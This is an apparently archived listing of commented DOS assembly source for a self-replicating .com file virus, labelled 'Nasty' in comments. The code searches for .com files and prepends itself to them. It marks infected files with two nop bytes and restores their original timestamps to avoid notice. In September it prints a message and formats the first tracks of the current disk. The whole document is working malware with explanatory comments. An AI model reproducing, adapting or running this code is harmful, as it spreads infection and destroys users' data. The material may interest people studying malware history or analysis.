home *** CD-ROM | disk | FTP | other *** search
- ;
-
- ; ---- Data Segment Values ----
-
- ; ds:[0f6h] = read buffer location
-
- ; ds:[0f8h] = write buffer location
-
- ; ds:[0fah] = store length of virus at this location
-
- ; ds:[0fch] = store length of file to be infected at this location
-
- ; ds:[0feh] = filename of file to infect
-
- ;
-
-
-
- .model tiny
-
- .code
-
- org 100h ; origin for .com files
-
- start:
-
-
-
- nop ; these two nop instructs will be used by 'Nasty'
-
- nop ; to determine if a file is already infected
-
-
-
- ;******
-
- ;get date
-
- ;******
-
- mov ah,2ah ; get the date
-
- int 21h ; do it
-
- cmp dh,09h ; is it September?
-
- jnz do_not_activate ; if NO jmp do_not_activate
-
- ;****
-
- ;the nasty bit
-
- ;****
-
- ;*
-
- ;* 1. Print message
-
- ;*
-
- lea dx,mess ; print message
-
- mov ah,09 ; 'Nasty in September'
-
- int 21h ; do it
-
- ;****
-
- ;* 2. Destroy disk
-
- ;****
-
- mov ah,19h ; get current drive (returned in al)
-
- int 21h ; do it
-
- mov dl,al ; dl = drive # to be formated
-
- mov ah,05 ; disk format function
-
- mov cl,01 ; first sector
-
- mov ch,00 ; first track
-
- mov dh,00 ; head zero
-
- mov al,10h ; 10h (16) sectors - 2 tracks
-
- int 13h ; do it (overwrite first 16 tracks on currently
-
- ; selected disc)
-
-
-
-
-
- do_not_activate:
-
- mov cx,80h ; save parameters; set counter to 80h bytes
-
- mov si,0080h ; offset in the current data segment of the byte
-
- ; to be copied
-
- mov di,0ff7fh ; offset to which byte is to be moved
-
- rep movsb ; move bytes until cx=0 (decrement cx by 1 each time
-
- ; loop is performed is done automatically)
-
- ; (increment by 1 of si & di is done automatically)
-
-
-
- lea ax,begp ; load exit from program offset address into ax
-
- mov cx,ax ; " " " " " " " cx
-
- sub ax,100h ; subtract start of .com file address (100h) from ax
-
- ; ax now contains the length of the virus
-
-
-
- mov ds:[0fah],ax ; put length of the virus into the data segment at
-
- ; offset 0fah
-
- add cx,fso ; add fso (5h) to cx (offset address of exit)
-
- ; so, cx=cx+5
-
- mov ds:[0f8h],cx ; move cx (end of virus + 5) into data segment at
-
- ; offset 0f8h. ** Start of the write buffer.
-
- ADD CX,AX ; add virus length (ax) to cx ?????
-
- mov ds:[0f6h],cx ; mov cx into data segment at offset 0f6h.
-
- ; ** Start of the read buffer
-
- mov cx,ax ; mov length of virus into cx
-
- lea si,start ; load address of 'start' (start of virus) into
-
- ; souce index
-
- mov di,ds:[0f8h] ; mov the value of the write buffer (@ 0f8h) into
-
- ; destination index
-
-
-
-
-
- rb: ; cx = counter (length of virus)
-
- ; si = offset of byte to be read
-
- ; di = offset of where to write byte to
-
- ; (auto decrement of cx & increment of si & di)
-
- rep movsb ; copy the virus into memory
-
-
-
- stc ; set the carry flag
-
-
-
- lea dx,file_type_to_infect ; set infector for .com files only
-
- mov ah,4eh ; find first file with specified params
-
- mov cx,20h ; files with archive bit set
-
- int 21h ; do it
-
- ; if file found, CF is cleared, else
-
- ; CF is set
-
-
-
- or ax,ax ; works the below instructions (jz & jmp)
-
- jz file_found ; if file found jmp file_found
-
- jmp done ; if no file found, jmp done (exit virus)
-
-
-
- file_found:
-
- mov ah,2fh ; get dta (returned in es:bx)
-
- int 21h ; do it
-
-
-
- mov ax,es:[bx+1ah] ; mov size of file to be infected into ax
-
- mov ds:[0fch],ax ; mov filesize into ds:[0fch]
-
- add bx,1eh ; bx now points to asciz filename
-
- mov ds:[0feh],bx ; mov filename into ds:[0feh]
-
- clc ; clear carry flag
-
-
-
- mov ax,3d02h ; open file for r/w (ds:dx -> asciz filename)
-
- mov dx,bx ; mov filename into dx
-
- int 21h ; do it (ax contains file handle)
-
-
-
- mov bx,ax ; mov file handle into bx
-
-
-
- mov ax,5700h ; get time & date attribs from file to infect
-
- int 21h ; do it (file handle in bx)
-
- push cx ; save time to the stack
-
- push dx ; save date to the stack
-
-
-
- mov ah,3fh ; read from file to be infected
-
- mov cx,ds:[0fch] ; number of bytes to be read (filesize of file to
-
- ; be infected
-
- mov dx,ds:[0f6h] ; buffer (where to read bytes to)
-
- int 21h ; do it
-
-
-
- mov bx,dx ; mov buffer location to bx
-
- mov ax,[bx] ; mov contents of bx (first two bytes - as bx is
-
- ; 16-bits) into ax.
-
-
-
- ; Now check to see if file is infected... if the
-
- ; file is infected, it's first two bytes will be
-
- ; 9090h (nop nop)
-
-
-
- sub ax,9090h ; If file is already infected, zero flag will be set
-
- ; thus jump to fin(ish)
-
- jz fin
-
-
-
-
-
- mov ax,ds:[0fch] ; mov filesize of file to be infected into ax
-
- mov bx,ds:[0f6h] ; mov where-to-read-to buffer into bx
-
-
-
- mov [bx-2],ax ; correct old len
-
-
-
- mov ah,3ch ; Create file with handle
-
- mov cx,00h ; cx=attribs -- set no attributes
-
- mov dx,ds:[0feh] ; point to name
-
- clc ; clear carry flag
-
- int 21h ; create file
-
- ; Note: If filename already exists, (which it does)
-
- ; truncate the filelength to zero - this is ok as
-
- ; we have already copied the file to be infected
-
- ; into memory.
-
-
-
- mov bx,ax ; mov file handle into bx
-
- mov ah,40h ; write file with handle (write to the file to be
-
- ; infected) - length currently zero
-
- ; cx=number of bytes to write
-
- mov cx,ds:[0fch] ; length of file to be infected
-
- add cx,ds:[0fah] ; length of virus
-
- mov DX,ds:[0f8h] ; location of write buffer (this contains the virus
-
- ; + the file to be infected)
-
- int 21h ; write file
-
- ; new file = virus + file to be infected
-
-
-
- mov ax,5701h ; restore original time & date values
-
- pop dx ; get old date from the stack
-
- pop cx ; get old time from the stack
-
- int 21h ; do it
-
- ; Note: Infected file will now carry the time & date
-
- ; it had before the infection.
-
-
-
- mov ah,3eh ; close file (bx=file handle)
-
- int 21h ; do it
-
- ; Note: date & time stamps automatically updated if
-
- ; file written to.
-
-
-
- fin:
-
- stc ; set carry flags
-
- mov ah,4fh ; find next file (.com)
-
- int 21h ; do it
-
- or ax,ax ; decides zero flag outcome
-
- jnz done ; if no more .com files, jmp done
-
- JMP file_found ; else begin re-infection process for new file.
-
-
-
- done:
-
- mov cx,80h ; set counter (cx) = 80h
-
- mov si,0ff7fh ; source offset address (copy from here)
-
- mov di,0080h ; destination offset address (copy to here)
-
- rep movsb ; copy bytes! (cx is auto decremented by 1
-
- ; si & di are auto incremented by 1)
-
- ; Note: this is a 'restore parameters' feature
-
- ; this does the reverse of what what done earlier
-
- ; in the program (do_not_activate:)
-
-
-
- mov ax,0a4f3h ;
-
- mov ds:[0fff9h],ax ;
-
- mov al,0eah ;
-
- mov ds:[0fffbh],al ; reset data segment locations ??? (to previous
-
- mov ax,100h ; values before virus infection)
-
- mov ds:[0fffch],ax ;
-
- lea si,begp ; load exit from program offset address into si
-
- lea di,start ; load offset address of start of virus into di
-
- mov ax,cs
-
- mov ds:[0fffeh],ax ; re-align cs = ds ???
-
- mov kk,ax
-
- mov cx,fso
-
-
-
- db 0eah ; define byte
-
- dw 0fff9h ; define word
-
- kk dw 0000h ; define kk = word
-
-
-
- mess db 'Sad virus - 24/8/91',13,10,'$' ; virus message to display
-
-
-
- file_type_to_infect db '*?.com',0 ; infect only .com files.
-
-
-
- fso dw 0005h ; store 5 into 'fso'. dw means that fso is 2 bytes
-
- ; in size (a word)
-
- ; ----- alma mater
-
-
-
-
-
- begp:
-
- mov ax,4c00h ; normal dos termination (set al to 00)
-
- int 21h ; do it
-
-
-
- end start
-
- ��
